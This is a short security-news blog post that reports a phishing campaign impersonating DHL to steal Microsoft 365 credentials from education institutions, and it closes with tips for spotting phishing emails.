DHL fake email used to bypass Microsoft 365 accounts

Published January 20, 2023
Author: Ash Khan

DHL fake email used to bypass Microsoft 365 accounts

Published January 20, 2023
Author: Ash Khan

The Fake DHL new phishing campaign impersonates the delivery company.

According to specialists, a new phishing attempt has been discovered. It impersonates logistics organization DHL in order to acquire Microsoft 365 office credentials from victims in the education field.

 

Cybersecurity website experts from Armorblox recently found a huge phishing effort. There have been more than 10,000 emails sent to inboxes belonging to “private education institutions”.

 

The email is designed to appear to be from DHL. With similar business branding and tone of voice, one would expect from the transportation giant. The receiver is advised in the email labeled “DHL Shipping Document/Invoice Receipt”. It states that a customer delivered a shipment to the incorrect address and that the proper delivery address must be given.

False login prompt

The email definitely includes an attachment, labeled “Shipping Document Invoice Receipt”. When viewed, it seems to be a blurred-out sample of a Microsoft Excel file.

 

A Microsoft login screen appears above the blurred-out document. It attempts to fool victims into believing they should check their Microsoft 365 accounts to read the file’s contents. If the victims supply the login credentials, the attackers directly receive these credentials.

Armorblox revealed that the email attack leveraged language as its primary attack vector to circumvent both Microsoft Office 365 and EOP email security.  These native email security layers are able to stop huge spam and phishing efforts and known viruses and dangerous URLs. On the other hand, the targeted email attack, evaded Microsoft email security since it had no harmful URLs or links. Additionally, it included an HTML file containing a malicious phishing form.”

According to the researchers, the attackers utilized a genuine domain, allowing them to avoid Microsoft’s email authentication checks.

Security Tips

Businesses can best protect themselves against phishing attacks by training their employees to recognize red flags in their inboxes. Such as the sender’s email address, typos, spelling errors, a sense of urgency, legitimate emails almost never require the user to respond urgently, and unexpected links/attachments.

Post Views: 130
0

Popular Tags

API Integration Branding Services Business Cloud Backup storage cloud storage Cloud VPS Server Hosting Database Services Digital Marketing eBay Store Email Hosting Email Marketing & CRM Email security Explainer Video Facebook Ads Fast Vpn FTP hosting GMAIL Google Ads Google Workspace hacked website repair IT Support Services Linux Managed AWS Cloud Managed Azure Cloud Microsoft 365 Microsoft Office 365 Microsoft Teams Integration mobile apps Outlook email Reseller Hosting SEO Services Server Management SIM Hosting Service SMS Services Social Media Marketing SQL Services Transfer Domain Name Vulnerability Assessment web applications Web Hosting Web Maintenance Website Designing website repair services Website Security Wordpress Hosting

Latest Posts